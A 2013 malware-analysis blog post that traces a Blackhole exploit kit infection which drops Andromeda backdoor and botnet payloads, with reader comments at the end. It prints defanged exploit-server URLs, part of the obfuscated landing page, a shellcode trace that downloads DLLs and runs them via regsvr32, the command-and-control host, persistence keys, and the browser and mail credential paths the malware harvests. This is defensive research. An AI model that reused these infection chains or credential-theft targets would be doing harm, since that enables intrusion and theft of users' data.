Saturday, January 19, 2013

A case of "Buggy Ransomware" with Backdoor, Spyware (is an Andromeda + Botnet CnC) Infection via Apache's Blackhole Exploit Kit

Background

I was contacted by a fellow researcher friend @StopMalvertisin to take a look into an infection of the double trojan downloading a Ransomware which MO of faking Java 7u11 written in the Stop Malvertising report here -->>[Link]. The report is well-explaining the native of the infection, so I guess what's left for me to do next is checking what's under the hood. I'll try to explain in a simple detail as possible. Please bear with my english, here we go:

The infector

Following the hinted url, I tried to access it.. and was ending up like this: Good, the moronz was really made me so "happy" so in some minutes I flushed them: and also exposed the flushed payloads in twitter here: (See↓ how the detection ratio was very low) If you follow our guide published in here -->>[GUIDE] and our previous posts then you will have no problem w/getting same samples. So let's see the log to learn why we failed in the first run.. :-)
URL: h00p://digitalcurrencyreport.com/cybercrime-suspect-arrested
Resolving digitalcurrencyreport.com... seconds 0.00, 109.163.230.125
Caching digitalcurrencyreport.com => 109.163.230.125
Connecting to digitalcurrencyreport.com|109.163.230.125|:80... seconds 0.00, connected.
GET /cybercrime-suspect-arrested HTTP/1.0
Host: digitalcurrencyreport.com
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK                                "
Server: nginx admin
Date: Sat, 19 Jan 2013 06:57:46 GMT
Content-Type: text/html
Content-Length: 73
Connection: keep-alive
Last-Modified: Fri, 18 Jan 2013 04:23:17 GMT
Accept-Ranges: bytes
X-Cache: HIT from Backend                           "
  :
200 OK (etc)
200 w/bad response means you have to reach a "right" parameter/page, I don't think I made mistake with my params so is a matter of path/page.. After preparing bruter data for infector page names, tried the index pages 1st, and shortly hit the jackpot... was the server's root, LOL (lesson number one, better making sure if your target is still fresh !)
GET / HTTP/1.0
User-Agent: MalwareMustDie to Moronz: Thou salt not insult my beloved Mom!
Host: digitalcurrencyreport.com
HTTP request sent, awaiting response...
  :                                                  "
HTTP/1.1 200 OK
Server: nginx admin
Date: Sat, 19 Jan 2013 07:25:57 GMT
Content-Type: text/html
Content-Length: 990
Connection: keep-alive
Last-Modified: Wed, 16 Jan 2013 02:42:01 GMT
Accept-Ranges: bytes
X-Cache: HIT from Backend
200 OK
Length: 990 [text/html]
16:26:06 (28.16 MB/s) - `index.html' saved [990/990]                        "
the code inside:
  :
<title>ERROR: The requested URL could not be retrieved</title>
<meta http-equiv="refresh" content="3;url=/cybercrime-suspect-arrested/">
</head><body><iframe src='h00p://mongif・biz/assumed/timing_borrows.php' width=1 height=1 style='visibility:hidden;'></iframe>
<h1>ERROR</h1>
So, hello landing page, let's play, 1st fetched it:
Resolving mongif.biz... seconds 0.00, 46.166.169.179
Caching mongif.biz => 46.166.169.179
Connecting to mongif.biz|46.166.169.179|:80... seconds 0.00, connected.
GET /assumed/timing_borrows.php HTTP/1.0
User-Agent: MalwareMustDie to Moronz: Thou salt not insult a crusader!
Host: mongif.biz
HTTP request sent, awaiting response...
  :                                                   "
HTTP/1.1 200 OK
Date: Sat, 19 Jan 2013 07:33:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Connection: close
Content-Type: text/html; charset=UTF-8
200 OK
Length: unspecified [text/html]
16:33:37 (98.14 KB/s) - `timing_borrows.php' saved [119372]                "
↑now we have Apache/2.2.3 (CentOS) + PHP/5.3.20 serving landing page.. What's the exploit kit? Snipped the landing page code with $ top:
<html><head><title></title></head><body>
<applet code="hw" archive="/assumed/timing_borrows.php?ynafkyuv=tvmamz&vqew=fbu">
<param name="prime" value="" />
<param name="val" value="Dyy3Ojj0toA8.w?8UjViiK0eMjy808oAN?tllt_..
<div></div><script>function c(){if(window・document)s+=String.fromCharCode(a[i])..
<script>var a = "!!8:97:!!4:32:80:!08:!!7:!03:!05:!!0:68:!0!:!!6:!0!:99:!!6:6!:!23:!..
!6:!2!:!!2:!0!:!!!:!02:32:98:6!:6!:34:!02:!!7:!!0:99:!!6:!05:!!!:!!0:34:!25:44:!05:!!5..
98:4!:63:40:!00:46:!05:!!5:68:!0!:!02:!05:!!0:!0!:!00:40:99:4!:63:!!0:!0!:!!9:32:82:!0..
3:!20:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:77:97:!!6:!04:46:!09:!05:!!0:40:99:46:!08..
:48:34:93:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:52:59:97:43:43:4!:!23:!05:!02:40:47:9..
:!!5:93:47:46:!!6:!0!:!!5:!!6:40:!00:9!:98:93:4!:4!:!23:!02:6!:!!0:97:!!8:!05:!03:97:!..
0:97:46:!08:!0!:!!0:!03:!!6:!04:59:!02:43:43:4!:!23:!09:6!:97:9!:!02:93:46:!00:!0!:!!5..
 :
Yes, friend, at this time I know is a blackhole. Shortly, I decoded it here -->>[PASTEBIN] To find the infection components are as per below download urls:
// The JARs are here:
// Use the applet in landing page & fetched two jars:
URL: "h00p://mongif.biz/assumed/timing_borrows.php"
HTTP/1.1 200 OK
Date: Sat, 19 Jan 2013 07:29:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Content-Length: 22568
ETag: e96e7e45516383c129d8bfabe0ce7a15
Last-Modified: Sat, 19 Jan 2013 07:29:23 GMT
Accept-Ranges: bytes
Connection: close
Content-Type: application/java-archive
200 OK
16:29:32 (58.72 KB/s) - try1.jar saved [22568/22568]
  :
HTTP/1.1 200 OK
Date: Sat, 19 Jan 2013 07:31:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Content-Length: 16532
ETag: ea880b47daef50875ebe70c2fb427017
Last-Modified: Sat, 19 Jan 2013 07:31:56 GMT
Accept-Ranges: bytes
Connection: close
Content-Type: application/java-archive
200 OK
Length: 16,532 (16K) [application/java-archive]
16:32:04 (50.54 KB/s) - try2.jar saved [16532/16532]

The PDFs are here:                           "
h00p://mongif.biz/assumed/timing_borrows.php?wkqavggu=30:1n:1i:1i:33&pqu=30:2v:3h&mblwxwdx=1m:33:1n:30:1g:1o:1i:1l:2w:33:1p:1p:1l:31:1k:30:1g:1f:1i:1l:1f:1g&ludkpgbm=1k:1d:1f:1d:1g:1d:1f
h00p://mongif.biz/assumed/timing_borrows.php?ggtmfzl=30:1n:1i:1i:33&lddsvzbu=3f&pznkfzh=1m:33:1n:30:1g:1o:1i:1l:2w:33:1p:1p:1l:31:1k:30:1g:1f:1i:1l:1f:1g&wnq=1k:1d:1f:1d:1g:1d:1f"

The SWF are here:                                   "
h00p://mongif.biz/assumed/timing_borrows.php?jdp=30:1n:1i:1i:33&chjlohkh=31:31:3c:3j:2v&npbua=1m:33:1n:30:1g:1o:1i:1l:2w:33:1p:1p:1l:31:1k:30:1g:1f:1i:1l:1f:1g&ublfosyz=xchadllm
h00p://mongif.biz/assumed/timing_borrows.php?nsxojsu=30:1n:1i:1i:33&uflnpv=34:30:3n:35&qtpzz=1m:33:1n:30:1g:1o:1i:1l:2w:33:1p:1p:1l:31:1k:30:1g:1f:1i:1l:1f:1g&nyt=clxndipk"
↑NOTED, the path of this BHEK serve the infector. Below is the detection ratio of these exploit infectors in VT: Here --> [LandingPage] [JAR1] [JAR2] [PDF1] [PDF2] [SWF1] [SWF2] (I wrote comment of WHICH exploit CVE used in each file in VT comment page) Most of these file exploit infectors are usually ones found in Blackhole EK, except one of the PDF infector is a bit special, it contains 4(four) CVE infector, actually I tweeted it here, see the VT comment for CVE code:

Double Hit infection

So here's the point. I noticed the shellcode in landing page & in PDF is longer than usual. Landing page's (PluginDetect 0.7.9 used, at shellcode function): ↑Contains two urls of the payload download to be executed by the API below:
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255) 1
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon) 0x1a400000
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\]) 
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://mongif.biz/assumed/timing_borrows.php?ff=30:1n:1i:1i:33&se=1m:33:1n:30:1g:1o:1i:1l:2w:33&w=1k&xe=w&qj=v, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) 0
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) 
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) 
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://mongif.biz/assumed/timing_borrows.php?nf=30:1n:1i:1i:33&qe=1l:31:1k:30:1g:1f:1i:1l:1f:1g&m=1k&hc=e&sf=z, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt1.dll) 0
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt1.dll, uCmdShow=0) 
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt1.dll, uCmdShow=0) 
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
You'll see the DOUBLE payload url in there↑ This shellcode is actually called & executed by SWF & JAR in post exploitation. The PDFs have their own way, in one PDF with 4 CVE exploiter we found below string: If you save it as binary and see it in ASCII then swap per 2 bits, in the end of the strings you'll see a double payload download url too: In another PDF you'll see the code below after you decoding its obfuscation: ↑the form of the two payload download urls in above picture is self explanatory :-)

Payloads

Payloads are in the Exploit Kit server as per URL mentioned API above. However, they made callbacks the CnC server in the different location. I won't write how I fetched the payloads, pls see previous posts/guide. But below is the download log as the evidence of this crime:
//first payload..

HTTP/1.1 200 OK
Date: Sat, 19 Jan 2013 07:43:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Pragma: public
Expires: Sat, 19 Jan 2013 07:43:56 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private                                             "
Content-Disposition: attachment; filename=’calc.exe’
Content-Transfer-Encoding: binary
Content-Length: 80384
Connection: close
Content-Type: application/x-msdownload
200 OK
Length: 80,384 (79K) [application/x-msdownload]
16:44:05 (93.77 KB/s) - `calc.exe' saved [80384/80384]                      "

// second payload..

HTTP/1.1 200 OK
Date: Sat, 19 Jan 2013 07:44:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Pragma: public
Expires: Sat, 19 Jan 2013 07:44:36 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private                                             "
Content-Disposition: attachment; filename=’info.exe’
Content-Transfer-Encoding: binary
Content-Length: 30208
Connection: close
Content-Type: application/x-msdownload
200 OK
Length: 30,208 (30K) [application/x-msdownload]
16:44:45 (129.68 KB/s) - `info.exe' saved [30208/30208]                      "
Below is the detection ratio of these payloads in VT: [info.exe] [calc.exe] You'll see↑ how poor the detection ratio of these samples.

What are these payloads?

Because is just too long, I can't go to details of my analysis for binaries. But I will write the infection flow step by step based on behavior analysis data of what these payloads do, with pictures, per sample. So you'll get the picture of what the payloads is actually do, better than a bunch of codes.. It wasn't an easy task (actually execution speed was so fast) so I did my best: info.exe info.exe is a malware classified by the name of Win32/Andromeda(aka Gamarue). A type of malware that is famous w/spyware, backdoor, stealer & downloader function. Andromeda botnet is one of popular crimeware, in this case Blackhole is used to distribute its trojan sets with the double infection. info.exe is in charge on backdoor function, while calc.exe is the botnet trojan. You'll find the good reference of these trojans here -->>[Ref] For Andromeda Botnet these are good 2 good references -->>[HERE]->>[HERE] Back to our case : This file will self copied itself into C:\Documents and Settings\All Users\ with the filename of svchost.exe, API used:
PID: 3140 [PATH]\info.exe ADDR: 0x85017a 
CopyFileA(lpExistingFileName: "[PATH]\info.exe", 
lpNewFileName: "C:\Documents and Settings\All Users\svchost.exe", 
bFailIfExists: 0x0)
During execution it also injects another process in memory: PoC, see the parent PID: The info.exe was opening TCP/IP 0.0.0.0 & listening to port 8000 as a daemon... At this time in the memory also detected the TCP traces:
00000001858F   MSAFD Tcpip [TCP/IP]
0000000011CE   wshtcpip.pdb
000000018AE3   \Registry\Machine\System\CurrentControlSet\Services\Tcp\VParameters
000000018B2B   \Registry\Machine\System\CurrentControlSet\Services\Tcp\Parameters
000000018B73   \Registry\Machine\System\CurrentControlSet\Services\Tcpip\Parameters
000000000C9A   C:\WINDOWS\system32\wshtcpip.dll
00000002C093   MSAFD Tcpip [TCP/IP]
00000002C307   MSAFD Tcpip [UDP/IP]
00000002C57B   MSAFD Tcpip [RAW/IP]
000000018A33   Tcpip
info.exe stays idle like that, below is the stacks info (see the idle part) In registry was recorded autorun + malicious setting of Internet Cache, please NOTED the faking of "Run\SunJavaUpdateSched" used↓
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SunJavaUpdateSched: "C:\Documents and Settings\All Users\svchost.exe"

HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013012020130121\CachePath: "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012013012020130121\"
In the memory I saw the strings related to the info.exe of above operation, With NOTED the Virtual machine detection + JavaUp(date) strings. Moreover the usage of crypto:
0x00D0E7   SOFTWARE\Microsoft\Cryptography\Defaults\Provider\
0x00D357   SOFTWARE\Microsoft\Cryptography\Providers\Type 
0x00D387   SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 
0x00E047   SOFTWARE\Microsoft\Cryptography\Defaults\Provider
0x00E07F   SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types
And my TestPC user's variable sets are all loaded up too:
0x02CEBD   ALLUSERSPROFILE=C:\Documents and Settings\All Users
0x02CF25   APPDATA=C:\Documents and Settings\%%USER\Application Data
0x02CF93   CommonProgramFiles=C:\Program Files\Common Files
0x02CFF5   COMPUTERNAME=%USER%-1379CF37C25
0x02D02F   ComSpec=C:\WINDOWS\system32\cmd.exe
0x02D077   FP_NO_HOST_CHECK=NO
0x02D09F   HOMEDRIVE=C:
0x02D0B9   HOMEPATH=\Documents and Settings\%USER%
0x02D103   LOGONSERVER=\\%USER%-1379CF37C25
0x02D13F   NUMBER_OF_PROCESSORS=1
0x02D16D   OS=Windows_NT
0x02D189   Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
0x02D203   PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
0x02D275   PROCESSOR_ARCHITECTURE=x86
0x02D2AB   PROCESSOR_IDENTIFIER=x86 Family 6 Model 13 Stepping 6, GenuineIntel
0x02D333   PROCESSOR_LEVEL=6
0x02D357   PROCESSOR_REVISION=0d06
0x02D387   ProgramFiles=C:\Program Files
0x02D3C3   SESSIONNAME=Console
0x02D3EB   SystemDrive=C:
0x02D409   SystemRoot=C:\WINDOWS
0x02D435   TEMP=C:\DOCUME~1\%USER%\LOCALS~1\Temp
0x02D47B   TMP=C:\DOCUME~1\%USER%\LOCALS~1\Temp
0x02D4BF   USERDOMAIN=%USER%-1379CF37C25
0x02D4F5   USERNAME=%USER%
0x02D50F   USERPROFILE=C:\Documents and Settings\%USER%
0x02D563   windir=C:\WINDOWS
For the sharing analysis purpose: More memory textual data of info.exe (Trojan/Andromeda) -->>[Download] The memory dump of Trojan/Andromeda info.exe is here-->>[PASTEBIN] calc.exe calc.exe is actually a botnet component of Andromeda trojan, this one does the communication to the CnC and download servers, I am sure this one is responsible for the download of other malwares like the Ransomware in StopMalwaretising case. Upon executed it also doing the self-copied with self-deleted:
PID: 3140 [PATH]\calc.exe ADDR: 0x87021b 
CopyFileA(lpExistingFileName: "[PATH]\calc.exe", 
lpNewFileName: "%AppData%\igfx\igfxtray.exe", 
bFailIfExists: 0x0)
In the same folder also detected the Identifier text file contains the defined HostID of my test machine: Upon execution, after self-copied, it also inject into another process: Which was executed from the new path: In registry was detected the below additional changes:
----------------------------------
Keys added:
----------------------------------
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{SG16VPH3-6PN7-VTP0-6V64-104BV7F3IRAF}
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.Identifier
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.Identifier\OpenWithList
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Streams\6
----------------------------------
Values added:
----------------------------------
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{SG16VPH3-6PN7-VTP0-6V64-104BV7F3IRAF}\StubPath: ""C:\Documents and Settings\USER\Application Data\igfx\igfxtray.exe""
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Run\igfxtray: "C:\Documents and Settings\USER\Application Data\igfx\igfxtray.exe"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\USER\Application Data\igfx\igfxtray.exe: "Pagent Show"
----------------------------------
Values deleted:
----------------------------------
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\14: 30 00 31 00 30 00 2E 00 62 00 6D 00 70 00 00 00 3C 00 32 00 00 00 00 00 00 00 00 00 00 00 30 31 30 2E 6C 6E 6B 00 26 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 30 00 31 00 30 00 2E 00 6C 00 6E 00 6B 00 00 00 16 00 00 00
----------------------------------
Values modified:
----------------------------------
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 02 00 00 00 1E 00 00 00 E0 FD F4 9E 68 F6 CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 02 00 00 00 20 00 00 00 00 65 59 10 6B F6 CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 02 00 00 00 3F 00 00 00 20 49 41 9F 68 F6 CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 02 00 00 00 41 00 00 00 D0 E8 6E 10 6B F6 CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:::{450Q8SON-NQ25-11Q0-98N8-0800361O1103}: 01 00 00 00 06 00 00 00 60 85 99 AA 71 A4 CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:::{450Q8SON-NQ25-11Q0-98N8-0800361O1103}: 02 00 00 00 07 00 00 00 C0 38 E9 E7 6A F6 CD 01
We also detecting the logs created by this malware, with the location and initial value below: Tried to brute XOR it, unsuccessful... Even tried to translate it in many lang/encoding, still meaningless.. If anyone can help to figure what it is, here's the FULL log file-->>[Download] In the memory I found the similar encrypted string pattern too:
0x02D1B1   s}X_a}Tb\}
0x02D1D5   s}X_a}
0x02D1F9   s}X_a}
0x02D22D   s}X_a}Lc\}
0x02D241   s}X_a}
0x02D255   s}X_a}pb\}
0x02D291   s}X_a}
0x02D2A9   a}X_a}
0x02D2B7   X_a}8c\}
0x02D2F1   s}X_a}
0x02D33D   s}X_a}
0x02D387   Service Pack 3
0x02D4A0   ka}/ka}?ka}Oka}_ka}oka}
0x02D4EC   pa}-pa}=pa}Mpa}]pa}mpa}}pa}
0x02D528   qa}"qa}3qa}Dqa}Uqa}fqa}wqa}
0x02D564   ra}!ra}2ra}Cra}Tra}era}vra}
0x02D5A0   sa} sa}1sa}Bsa}Ssa}dsa}usa}
0x02D5E0   ta}0ta}Ata}Rta}cta}tta}
0x02D608   ta}k_a}
0x02D618   ua}cva}}va}U
0x02D628   va}!wa};wa}
0x02D648   xa}4xa}Hxa}\xa}sxa}

CnC and Credentials..

So now we know the CnC of this payload & how it supposed to communicate:
CnC: wordpress.serveblog.net:3360 IP: 46.253.180.35 Methods: FCONNECT %s:%d HTTP/1.0 http://%s%s GET %s HTTP/1.1 Host: %s Connection: close
If we see the reverse result in memory of igfxtray.exe these data will be seen: In igfxtray.exe I found the trace of sqlite commony used by Andromeda Botnet:
sqlite3.dll
mozsqlite3.dll
%s\signons.sqlite
sqlite3_open
sqlite3_close
sqlite3_prepare_v2
sqlite3_step
sqlite3_column_text
Let's be sure by capturing the traffic, below is the pic of take-1 PCAP: With the packet data as per HEX below: I share the PCAP capture data below [PCAP1] [PCAP2] [PCAP3] [ADDITIONAL] Other researcher was kindly to contribute his PCAP Traffic Data which proofing the communication between infected PC to the host: ugctrust.com and requesting POST command to ugctrust.com/image.php, as per below capture snapshot of the traffic related in details: The PCAP data is here --->>[PCAP] Thank's to @Userbased in kernelmode for the support. Now we have clear evidence that related this malware to ugctrust.com that backing up the verdict of REVETON download caused by this set of trojans. Furthermore in the memory was detected many OTHER stuff.. The below browser's path:
%s\Mozilla\Firefox\profiles.ini
%s\Mozilla\Firefox\%s
%s\Thunderbird\profiles.ini
%s\Thunderbird\%s
%s\Mozilla\SeaMonkey\profiles.ini
%s\Mozilla\SeaMonkey\%s
%s\Opera\Opera\wand.dat
%s\Opera\Opera\profile\wand.dat
And the location of our passwords/credentials
WindowsLive:name=*
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Email
POP3 User
POP3 Server
POP3 Password
IMAP User
IMAP Server
IMAP Password
HTTP User
HTTP Server
HTTP Password
SMTP User
SMTP Server
SMTP Password
%c%c%S
abe2869f-9b47-4cd9-a358-c22904dba7f7
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
index.dat
History
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
%s\Google\Chrome\User Data\Default\Login Data
%s\Chromium\User Data\Default\Login Data
localhost
USERNAME
Just like the info.exe, my PC data also loaded & spotted:
0x02CEBD   ALLUSERSPROFILE=C:\Documents and Settings\All Users
0x02CF25   APPDATA=C:\Documents and Settings\%USER%\Application Data
0x02CF93   CommonProgramFiles=C:\Program Files\Common Files
0x02CFF5   COMPUTERNAME=%USER%-1379CF37C25
0x02D02F   ComSpec=C:\WINDOWS\system32\cmd.exe
0x02D077   FP_NO_HOST_CHECK=NO
0x02D09F   HOMEDRIVE=C:
0x02D0B9   HOMEPATH=\Documents and Settings\%USER%
0x02D103   LOGONSERVER=\\%USER%-1379CF37C25
0x02D13F   NUMBER_OF_PROCESSORS=1
0x02D16D   OS=Windows_NT
0x02D189   Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
0x02D203   PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
0x02D275   PROCESSOR_ARCHITECTURE=x86
0x02D2AB   PROCESSOR_IDENTIFIER=x86 Family 6 Model 13 Stepping 6, GenuineIntel
0x02D333   PROCESSOR_LEVEL=6
0x02D357   PROCESSOR_REVISION=0d06
0x02D387   ProgramFiles=C:\Program Files
0x02D3C3   SESSIONNAME=Console
0x02D3EB   SystemDrive=C:
0x02D409   SystemRoot=C:\WINDOWS
0x02D435   TEMP=C:\DOCUME~1\%USER%\LOCALS~1\Temp
0x02D47B   TMP=C:\DOCUME~1\%USER%\LOCALS~1\Temp
0x02D4BF   USERDOMAIN=%USER%-1379CF37C25
0x02D4F5   USERNAME=%USER%
0x02D50F   USERPROFILE=C:\Documents and Settings\%USER%
I think this is how they format the log:
%s.Identifier
%Rand%
%d:0:0:%s\%s;
%d:%I64u:0:%s\%s;
%c%I64u
%llu
%s%.2d-%.2d-%.4d
[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
You can call me "paranoia" but these key's data is there...
[Backspace]
[Enter]
[Tab]
[Arrow Left]
[Arrow Up]
[Arrow Right]
[Arrow Down]
[Home]
[Page Up]
[Page Down]
[End]
[Break]
[Delete]
[Insert]
[Print Screen]
[Scroll Lock]
[Caps Lock]
[Alt]
[Esc]
[Ctrl+%c]
The rest of the memory data in text is here -->>[Download] I captured the memory dump of igfxtray.exe here -->>[Download] What happened after we restart the PC? It just won't start, my MBR must have been changed.. A buggy Andromeda infection with Ransomware?? :-( Sadly I did not see any traffic to/from ugctrust.com nor a ransomware download.. Anyway the Botnet and Blackhole EK used is still up and running, who knows what they will infect us with next, let's shut this "badest" bad" actor down!

Network Infection Analysis (Evidence of Crime of mongif.biz)

The Blackhole malware infector IP hosted by domain mongif.biz was confirmed to be registered & used for malware infection purpose only, and curently still distributing Ransomware Malware actively. The other reports shows incident reported-->>[HERE] Below is the infector domains/registration info for the SHUTDOWN purpose, I marked the ID for responsible contact. For the fellow admins, please block this IP address: 46.166.169.179
//Hosts related to the infection verdict:
"mongif.biz      A  46.166.169.179
 www.mongif.biz  A  46.166.169.179"

//SOA record
mongif.biz
        primary name server = mongif.biz
        responsible mail addr = "kaizendass.gmail.com"
        serial  = 1358061503    ^^^^^^^^^^^^^^^^^^^^^
        refresh = 10800 (3 hours)
        retry   = 3600 (1 hour)
        expire  = 604800 (7 days)
       "default TTL = 38400 (10 hours 40 mins)"

//Name servers:
ns3.mongif.biz  A  46.166.169.179
ns4.mongif.biz  A  46.166.169.182

//INTERNET IDC:
Segment: 46.166.169.0/24 
ASN: AS57668 / SANTREX-AS

//Domain Registration (ID: PP-SP-001)
Domain Name: MONGIF.BIZ
"Domain ID: D52783523-BIZ"
"Registrant ID: PP-SP-001"
           ^^^^^^^^^^^^^^^^^
Created by Registrar:  DOMAINCONTEXT, INC.
Sponsoring Registrar:  DOMAINCONTEXT, INC.
Sponsoring Registrar   IANA ID:1111
Last Updated by Registrar: DOMAINCONTEXT, INC.
Domain Registration Date: Thu Jan 10 17:08:56 GMT 2013
Domain Expiration Date:  Thu Jan 09 23:59:59 GMT 2014
"Domain Last Updated Date: Sun Jan 13 08:06:57 GMT 2013"
                                ^^^^^^^^^^^^^^^^^^^^

Sample

For research + raising detection ratio purpose. Here's the samples -->>[MEDIAFIRE]

The moral of the story

Never ever insult any mother, that's just a way out of line, you'll have a BAD time & be cursed as a lifetime internet jerks like these moronz for sure..
#MalwareMustDie!!

6 comments:

  1. If we see a GET request like below from a machine, do we have to consider it as Blackhole Exploit Kit Driveby Download Request from a client-side exploits serving URLs or do we have to consider the machine already exploited by blackhole

    hxxp://tetraboro.net/detects/coming_lost-source.php?huyq=1m:2v:1g:1o:1k&tfize=32&wodyva=33:1k:1o:1n:1f:1i:1m:1i:32:2w&jqrub=1n:1d:1g:1d:1h:1d:1f

    Do we have to wait for signs of succcessful clienet-side exploitation?

    ReplyDelete
  2. Thank you for the very good question!

    The URL requested is a request for the PDF infector to Blackhole Exploit Kit infector server. I guess that machine just hit the landing page and issued the PDF exploit infector download after its Adobe version was being detected by the landing page.
    The last string is "1n:1d:1g:1d:1h:1d:1f" PDF versions being hashed by the function x(); of BHEK.

    At the time the URL sent, shows that the exploitation was not happened yet. However you'd better check the condition of the machine AFTER the time-frame. Upon the download succeeded the PDF will automatically be executed and issues the downloads of the malware payload(s) at the post-exploitation. The best thing to do is make that machine offline as soon as possible.

    PS: All of the PDF exploit served in this exploit kits are mostly not new, and aiming to specific vulnerable versions of Adobe. I recommend you to install the latest Adobe version on the machine, so you'll have no reason to be worry to get infected in the future.

    Good luck! And be free to ask more question, and I will try to help you out.

    ReplyDelete
  3. Hi, this exploit pack include CVE-2013-0422, right?
    Do you can upload this files ? ? https://lh4.googleusercontent.com/-bbRBtgqcnqQ/UPsBlE2MIaI/AAAAAAAAI8A/XfnUTwJVoB8/s500/002.JPG
    Thanks!

    ReplyDelete
  4. Replies
    1. We got this mess and more mess to come.

      Delete